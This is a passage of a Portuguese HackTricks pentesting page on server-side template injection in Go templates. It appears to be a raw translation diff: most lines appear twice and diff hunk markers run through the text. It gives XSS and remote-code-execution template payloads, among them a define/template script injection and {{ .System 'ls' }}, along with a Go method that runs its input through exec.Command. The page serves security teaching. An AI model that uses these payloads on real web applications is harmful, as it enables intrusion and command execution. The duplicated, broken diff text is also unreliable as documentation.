- `{{html "ssti"}}`, `{{js "ssti"}}` = Estes são alguns outros payloads que devem exibir a string "ssti" sem as palavras finais "js" ou "html". Você pode consultar mais palavras-chave no mecanismo [aqui](https://golang.org/pkg/text/template).
**Exploração de XSS**
Se o servidor estiver **usando o pacote text/template**, XSS é muito fácil de alcançar **simplesmente** fornecendo seu **payload** como entrada. No entanto, isso **não acontece com html/template** pois codifica a resposta em HTML: `{{"<script>alert(1)</script>"}}` --> `&lt;script&gt;alert(1)&lt;/script&gt;`
Se o servidor estiver **usando o pacote text/template**, XSS é muito fácil de alcançar **simplesmente** fornecendo seu **payload** como entrada. No entanto, isso **não é o caso com html/template** pois ele codifica o HTML da resposta: `{{"<script>alert(1)</script>"}}` --> `&lt;script&gt;alert(1)&lt;/script&gt;`
No entanto, Go permite **DEFINIR** um **template** inteiro e **depois chamá-lo**. O payload seria algo como:\
No entanto, Go permite **DEFINIR** um **template** inteiro e depois **chamá-lo posteriormente**. O payload será algo como:\
`{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}`
**Exploração de RCE**
A documentação para o módulo html/template pode ser encontrada [aqui](https://golang.org/pkg/html/template/), e a documentação para o módulo text/template pode ser encontrada [aqui](https://golang.org/pkg/text/template/), e sim, elas variam, e muito. Por exemplo, em **text/template**, você pode **chamar diretamente qualquer função pública com o valor “call”**, o que não é possível com html/template.
A documentação para ambos os módulos html/template pode ser encontrada [aqui](https://golang.org/pkg/html/template/), e a documentação para o módulo text/template pode ser encontrada [aqui](https://golang.org/pkg/text/template/), e sim, elas variam bastante. Por exemplo, em **text/template**, você pode **chamar diretamente qualquer função pública com o valor "call"**, no entanto, isso não é o caso com html/template.
Se você quer encontrar um RCE em Go via SSTI, deve saber que, assim como você pode acessar o objeto fornecido ao template com `{{ . }}`, você também pode **chamar os métodos do objeto**. Então, imagine que o **objeto passado tem um método chamado System** que executa o comando fornecido, você poderia abusar disso com: `{{ .System "ls" }}`\
Portanto, você provavelmente **precisará do código-fonte**. Um código-fonte potencial para algo assim seria:
Se você deseja encontrar um RCE em Go via SSTI, você deve saber que, assim como você pode acessar o objeto fornecido ao template com `{{ . }}`, você também pode **chamar os métodos dos objetos**. Portanto, imagine que o **objeto passado tenha um método chamado System** que executa o comando fornecido, você poderia abusar disso com: `{{ .System "ls" }}`\
Portanto, você provavelmente **precisará do código-fonte**. Um código-fonte potencial para algo assim terá a aparência de:
```go
func (p Person) Secret (test string) string {
out, _ := exec.Command(test).CombinedOutput()
@ -936,7 +929,7 @@ return string(out)
### Mais Exploits
Confira o restante de [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) para mais exploits. Você também pode encontrar informações interessantes de tags em [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
Verifique o restante em [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) para mais exploits. Você também pode encontrar informações interessantes sobre tags em [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
## BlackHat PDF
@ -944,9 +937,9 @@ Confira o restante de [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/
## Ajuda Relacionada
Se achar que pode ser útil, leia:
Se você achar útil, leia:
* [Truques do Flask](../../network-services-pentesting/pentesting-web/flask.md)
* [Dicas do Flask](../../network-services-pentesting/pentesting-web/flask.md)
* [Funções mágicas do Python](broken-reference/)
## Ferramentas
@ -959,11 +952,11 @@ Se achar que pode ser útil, leia:
{% embed url="https://github.com/Hackmanit/template-injection-table" %}
## Lista de Detecção de Brute-Force
## Lista de Detecção de Força Bruta
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
## Prática & Referências
## Prática e Referências
* [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
@ -971,20 +964,20 @@ Se achar que pode ser útil, leia:
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa**. Com a **missão de promover o conhecimento técnico**, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa**. Com **a missão de promover o conhecimento técnico**, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
{% embed url="https://www.rootedcon.com/" %}
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas dicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>